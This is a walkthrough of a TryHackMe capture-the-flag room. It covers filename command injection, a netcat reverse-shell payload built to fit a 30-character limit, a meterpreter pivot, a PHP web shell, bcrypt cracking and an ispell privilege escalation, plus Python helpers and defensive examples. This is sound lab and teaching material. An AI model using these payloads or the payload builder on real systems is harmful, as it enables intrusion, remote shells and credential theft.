Tempus Fugit Durius TryHackme Writeup
By Shamsher khan This is a Writeup of Tryhackme room “Tempus Fugit Durius”
Room link: https://tryhackme.com/room/tempusfugitdurius
Note: This room is available to TryHackMe premium members only.
Task 1 Harder
Tempus Fugit is a Latin phrase that roughly translates to “time flies”.
Durius is also Latin and means “harder”.
This is a remake of Tempus Fugit 1, a bit harder and different from the first one. It is an intermediate/hard, real-life style box.
Let’s start with an nmap scan:
As we can see from the output, four ports are open: 22, 80, 111 and 51947. Let’s start by enumerating the HTTP service:
The “Upload” link at the top of the page looks interesting. Let’s navigate to it:
There is an upload option on the top right. I uploaded a shell and got an error about file types, which mentioned txt and rtf as the accepted ones.
I don’t know about txt, but rtf sounds a bit suspicious. I searched for rtf reverse shells and found links to RCE via rtf files, but all the available exploits targeted Windows.
Burp Suite
Then I decided to intercept the request while submitting the form and see if I could find something.
I was getting a redirect response in Burp and couldn’t figure it out, so @4nqr34z gave me a hint: play with the file name and look at the output in the browser.
So I did that. I renamed the file to shell.txt;id, sent the request, and in my browser I could see the output of the id command. The filename is evidently passed unsanitised to a shell, so the ; ends the intended command and whatever follows runs as a second one.
NOTE: if the Burp and browser juggling gets confusing, you can do the same thing by simply renaming your file and re-uploading it with a different command each time. Create a file named shell.txt;id and upload it to see the output, then rename it to shell.txt;ls to see that output, and so on.
Create a few files like this and upload them one by one.
If we run a command like ls -la through the filename we get the following output:
Use Ctrl+U (view page source) for a more readable view, since the browser collapses the whitespace in the command output.
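To make clear why a filename like shell.txt;id runs a command, here is an added Python example that is not part of the original writeup and not the room’s real server code. It models a hypothetical upload handler that concatenates the filename into a shell command (the behaviour observed above) next to a hardened version; the uploads directory, the allow-list and the wrapped ls -la command are assumptions made for illustration.

```python
# Added example (not the room's code): a hypothetical upload handler that
# concatenates the user-controlled filename into a shell command, beside a
# hardened version. UPLOAD_DIR, the allow-list and the wrapped 'ls -la'
# command are assumptions made for illustration.
import re
import subprocess

UPLOAD_DIR = "uploads"          # assumed location
MAX_LEN = 30                    # the room's observed filename length limit
SAFE_NAME = re.compile(r"^[A-Za-z0-9_-]+\.(txt|rtf)$")   # assumed allow-list


def vulnerable_command(filename: str) -> str:
    """Anti-pattern: string concatenation into a shell command.
    's.txt;id' becomes 'ls -la uploads/s.txt;id' and /bin/sh runs both halves."""
    return f"ls -la {UPLOAD_DIR}/{filename}"


def run_vulnerable(filename: str) -> str:
    """Execute the concatenated string through /bin/sh, as shell=True does."""
    proc = subprocess.run(vulnerable_command(filename), shell=True,
                          capture_output=True, text=True)
    return proc.stdout


def hardened_command(filename: str) -> list:
    """Allow-list the name and build argv directly: no shell is involved, so
    ';', '|', '`' and '$(...)' in the name are just bytes in one argument."""
    if len(filename) > MAX_LEN or not SAFE_NAME.fullmatch(filename):
        raise ValueError(f"rejected filename: {filename!r}")
    return ["ls", "-la", f"{UPLOAD_DIR}/{filename}"]


def run_hardened(filename: str) -> str:
    proc = subprocess.run(hardened_command(filename),
                          capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    injected = "s.txt;echo INJECTED"       # harmless stand-in for ';id'
    print(run_vulnerable(injected))        # INJECTED appears: the 2nd command ran
    try:
        run_hardened(injected)
    except ValueError as err:
        print(err)                         # the hardened handler refuses it
```

The hardened version fixes two things at once: the allow-list rejects the metacharacters, and building argv instead of a string means that even a name that slips past the regex can never reach a shell parser.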
Reverse shell
Several things make getting a reverse shell hard: you cannot use . # or / in the injected command, and the whole filename is limited to 30 characters. Converting the attacker IP to decimal solves both the length and the dot problem, because inet_aton() (and therefore nc) accepts a single 32-bit number as an address; 10.2.12.26 becomes 167906330. The dot in the .txt extension itself is accepted, since the upload requires it.
That is also why the file is renamed from file.txt to s.txt: every character counts. The payload below is 29 characters:
s.txt;nc 167906330 4444 -e sh
Now start a listener on port 4444 (the -e option needs a netcat build that supports it, which the box’s nc does).
Now upload the renamed file.
Here we get our shell:
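The payload-building step above, as an added Python example that is not from the original writeup. It converts the attacker address to the decimal form nc accepts and checks the two constraints (banned characters, 30-character limit); 10.2.12.26 is the dotted form of the 167906330 used above, and the base name and port are the ones from the payload.

```python
# Added example (not from the writeup): build the reverse-shell filename under
# the room's constraints. Assumptions: the attacker address 10.2.12.26 (the
# dotted form of 167906330), port 4444 and the 's.txt' base name.
import socket
import struct

FORBIDDEN = set(".#/")   # characters the filter blocks in the command part
MAX_LEN = 30             # total filename length the upload accepts


def ip_to_decimal(ip: str) -> int:
    """Dotted quad -> one 32-bit number. glibc's inet_aton() (hence nc on a
    Linux box) accepts this form, which removes every dot from the address."""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def decimal_to_ip(n: int) -> str:
    """Reverse of ip_to_decimal, to check what a payload points at."""
    return socket.inet_ntoa(struct.pack("!I", n))


def build_payload(base: str, ip: str, port: int) -> str:
    """Return '<base>;nc <decimal ip> <port> -e sh' or raise if it breaks the
    filter. The dot in the base name's extension is accepted by the upload;
    the character ban applies to the injected command."""
    cmd = f"nc {ip_to_decimal(ip)} {port} -e sh"
    bad = FORBIDDEN & set(cmd)
    if bad:
        raise ValueError(f"forbidden characters {sorted(bad)} in {cmd!r}")
    payload = f"{base};{cmd}"
    if len(payload) > MAX_LEN:
        raise ValueError(f"{len(payload)} chars, limit is {MAX_LEN}: {payload!r}")
    return payload


if __name__ == "__main__":
    print(ip_to_decimal("10.2.12.26"))              # 167906330
    print(build_payload("s.txt", "10.2.12.26", 4444))
    try:
        build_payload("file.txt", "10.2.12.26", 4444)   # 32 chars: too long
    except ValueError as err:
        print(err)
```

Run it with your own VPN address to get the exact filename to upload; if the upload form had enforced the dot ban on the extension too, the function would tell you which character broke the rule instead of leaving you guessing from a silent redirect.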
Upgrade the shell to a proper tty:
python -c 'import pty;pty.spawn("/bin/bash")'
We find FTP user credentials.
Time to log in to the FTP service.
But we couldn’t log in: there is no FTP client on this host, and we cannot install one.
We do, however, have Python on the box, so after a little research I wrote a small script using ftplib to talk to the FTP service instead:
Now upload this ftp.py to the machine and run it.
It worked! The listing shows a file on the FTP share named “creds.txt”. Let’s add a couple of lines to the script to retrieve “creds.txt” from the share to the box we are on, where we can read it:
#!/usr/bin/python
# Connect to the FTP service with the recovered credentials, list the share
# and download creds.txt into the current directory on the container.
from ftplib import FTP

ftp = FTP('ftp.mofo.pwn')
ftp.login('someuser', '04*************06')
ftp.retrlines('LIST')
with open('creds.txt', 'wb') as fp:
    ftp.retrbinary('RETR creds.txt', fp.write)
ftp.quit()
Upload the edited ftp.py again and run it; creds.txt is now on the box.
Recon
We don’t have many tools on the host, so we set up a Metasploit multi/handler and spawn a meterpreter reverse shell.
Create the reverse shell
Upload shell.elf to the machine
msfconsole
Now run shell.elf; as soon as it executes we get a meterpreter session.
What we can see here is another host on Interface 9, with the IP address “192.168.150.10”. We are inside a container, and there is a second network behind it. To reach the host on Interface 9 we need to pivot, so we set up port forwarding through the meterpreter session:
With the above command we created a local TCP relay that forwards port 80 on the remote host to port 8888 on our machine. Browsing to “localhost:8888” shows the same page we got initially from port 80, which does not help us find the admin panel we need. So the next step is discovering other hosts and virtual hosts on the “192.168.150.0/24” subnet.
The admin panel lives on a separate virtual host, so its name has to resolve to our forwarded port. Add
127.0.0.1 newcms.mofo.pwn
to the /etc/hosts file, then browse to
http://newcms.mofo.pwn:8080/admin/
and log in with the admin:B************G credentials.
We try editing a page and adding PHP code to get a shell.
Go to Settings > Theme, select the hello plugin and edit it.
The PHP reverse shell from pentestmonkey is used: http://pentestmonkey.net/tools/php-reverse-shell
After putting the reverse-shell code on the page and triggering it (with a listener running), I get my shell:
Finally I escaped the container and got a shell on the real machine. Let’s look at the “/home” directory:
There are two users, “benclower” and “me”, but we are not permitted to read their home directories. “/etc/passwd” confirms the same. So the first thing I did, after upgrading my shell to a meterpreter session again, was to go to “/tmp” and copy linPEAS over from my machine:
In the linPEAS output I saw database files in the “/var/www/html/inc/data/” directory. Let’s look there:
Download database.sdb to our machine.
For this we need a meterpreter session (its download command does the job):
Run shell.elf
Now we have the meterpreter session back.
Analyze the file locally with sqlite3:
What we find is the password hash of the user “Ben Clower”. The $2y$ prefix marks it as bcrypt, so a brute-force with hashcat (mode 3200) or john using rockyou.txt gives us the password. With it I switched to benclower.
$2y$***********************************************FC
Now we have the password of benclower.
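Pulling the hash out of a SQLite file whose schema you do not know in advance, identifying it and writing it out for john or hashcat, as an added Python example that is not from the original writeup. The database here is constructed in memory with an invented users table and a syntactically valid dummy bcrypt string; it is not the room’s database.sdb and not the real hash.

```python
# Added example (not from the writeup): extract credential hashes from a SQLite
# database whose schema is unknown, identify the hash type, and emit lines for
# john/hashcat. The database below is built in memory with an invented
# 'users' table and a syntactically valid DUMMY bcrypt string; it is not the
# room's database.sdb and not Ben Clower's real hash.
import re
import sqlite3

# (regex, name, hashcat mode). bcrypt is $2a$/$2b$/$2x$/$2y$ + 2-digit cost
# + 22-char salt + 31-char hash, all in bcrypt's base64 alphabet.
HASH_FORMATS = [
    (re.compile(r"^\$2[abxy]\$(\d{2})\$[./A-Za-z0-9]{53}$"), "bcrypt", 3200),
    (re.compile(r"^\$6\$"), "sha512crypt", 1800),
    (re.compile(r"^\$5\$"), "sha256crypt", 7400),
    (re.compile(r"^\$1\$"), "md5crypt", 500),
]

# Well-formed but meaningless bcrypt string (constructed, not a real hash).
DUMMY_BCRYPT = "$2y$10$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"


def identify_hash(h: str):
    """Return (name, hashcat_mode, cost) or None for an unrecognised string."""
    for rx, name, mode in HASH_FORMATS:
        m = rx.match(h)
        if m:
            cost = int(m.group(1)) if m.groups() else None
            return name, mode, cost
    return None


def find_credentials(conn: sqlite3.Connection):
    """Walk every table, pick columns that look like password/hash fields and
    pair them with the first column that looks like a user/name/email."""
    found = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        hash_cols = [c for c in cols if re.search(r"pass|hash|pwd", c, re.I)]
        if not hash_cols:
            continue
        user_col = next((c for c in cols
                         if re.search(r"user|name|email|login", c, re.I)), None)
        wanted = ([user_col] if user_col else []) + hash_cols
        select = ", ".join(f'"{c}"' for c in wanted)
        for row in conn.execute(f'SELECT {select} FROM "{table}"'):
            user = row[0] if user_col else "?"
            for value in row[(1 if user_col else 0):]:
                if isinstance(value, str) and value.startswith("$"):
                    found.append((table, user, value))
    return found


def cracker_lines(creds):
    """'user:hash' lines: john reads them directly; for hashcat use --username
    or strip the user part."""
    return [f"{user}:{h}" for _, user, h in creds]


def make_sample_db() -> sqlite3.Connection:
    """Constructed stand-in for database.sdb (invented schema and contents).
    For the real file use sqlite3.connect('database.sdb') instead."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE settings(key TEXT, value TEXT);
        INSERT INTO settings VALUES ('site_title', 'newcms');
        CREATE TABLE users(id INTEGER, full_name TEXT, email TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'Ben Clower', 'ben@example.invalid', '%s');
    """ % DUMMY_BCRYPT)
    return conn


if __name__ == "__main__":
    creds = find_credentials(make_sample_db())
    for table, user, h in creds:
        print(table, user, identify_hash(h))   # users Ben Clower ('bcrypt', 3200, 10)
    print("\n".join(cracker_lines(creds)))
```

Identifying the format before cracking matters with bcrypt in particular: the cost factor (10 here) sets how slow each guess is, so a wordlist attack with rockyou.txt is realistic but rules-heavy or mask attacks are not.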
Privilege escalation
Running linpeas.sh again reveals an unusual SGID file: ispell, which is set-group-ID to the adm group.
ispell has a shell escape (the ! command at its interactive prompt), so run it on any file it will find misspellings in, for example
ispell /bin/ping
and escape to a shell from the prompt.
The shell inherits the binary’s group, so we are now in the adm group.
Root
We can now read the log files. Investigating auth.log:
Someone appears to have typed their password into the username field, so it was recorded in the clear as a failed login for an invalid user.
That looks like a possible password for root. Let’s try to switch users!
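Detection logic for exactly this mistake, as an added Python example that is not in the original writeup. It runs over constructed sshd lines in auth.log format (invented host, addresses, times and candidate password), flags “invalid user” names that look like passwords, and links each one to the account the same source address successfully logged into afterwards. The heuristic for “looks like a password” and the sample lines are assumptions, not the room’s log.

```python
# Added example (not from the writeup): find passwords typed into the username
# field, from sshd lines in auth.log. The log lines below are constructed
# (invented host, addresses, times and candidate password); the heuristic for
# "looks like a password" is an assumption, not a rule from the room.
import re

AUTH_LOG = """\
Mar  3 10:14:02 durius sshd[2231]: Failed password for invalid user admin from 192.0.2.10 port 51022 ssh2
Mar  3 10:14:09 durius sshd[2231]: Failed password for invalid user Sup3rS3cretP@ss! from 192.0.2.10 port 51022 ssh2
Mar  3 10:14:15 durius sshd[2240]: Accepted password for root from 192.0.2.10 port 51030 ssh2
Mar  3 10:20:41 durius sshd[2301]: Failed password for benclower from 192.0.2.11 port 40122 ssh2
"""

LINE_RX = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<event>Failed|Accepted) password for (?:(?P<invalid>invalid user) )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")


def looks_like_password(name: str) -> bool:
    """Unix usernames are normally lowercase letters, digits, '.', '_' and '-'.
    Capitals or other punctuation in an 'invalid user' name usually mean a
    password landed in the wrong field (heuristic, assumed here)."""
    return re.search(r"[^a-z0-9._-]", name) is not None


def parse_auth_log(log: str):
    """One dict per recognised sshd password-auth line."""
    return [m.groupdict() for m in map(LINE_RX.match, log.splitlines()) if m]


def leaked_credentials(log: str):
    """Candidate passwords logged as invalid usernames, each linked to the
    account the same source address successfully logged into afterwards."""
    events = parse_auth_log(log)
    hits = []
    for i, ev in enumerate(events):
        if ev["event"] != "Failed" or not ev["invalid"]:
            continue
        if not looks_like_password(ev["user"]):
            continue
        later = [x["user"] for x in events[i + 1:]
                 if x["event"] == "Accepted" and x["ip"] == ev["ip"]]
        hits.append({"time": ev["ts"], "ip": ev["ip"],
                     "candidate": ev["user"],
                     "probable_account": later[0] if later else None})
    return hits


if __name__ == "__main__":
    for hit in leaked_credentials(AUTH_LOG):
        print(hit)
```

Read the real file with open('/var/log/auth.log').read() in place of AUTH_LOG. The same reasoning works from the attacker’s side (which is what the writeup does) and from the defender’s: a SOC that alerts on this pattern can force a password change before anyone with adm group access reads the log.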
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthroughs:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share it to help others with similar interests! Feedback is always welcome!